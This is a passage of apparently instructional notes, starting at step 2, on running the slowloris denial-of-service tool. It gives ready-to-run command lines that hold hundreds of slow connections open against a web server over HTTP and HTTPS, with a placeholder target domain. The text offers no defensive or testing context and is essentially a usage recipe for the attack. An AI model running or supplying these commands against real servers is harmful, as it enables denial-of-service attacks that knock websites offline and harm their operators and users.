2. install perl-doc for reading slowloris manual
3. run slowloris,
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
4. run slowloris for https,
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
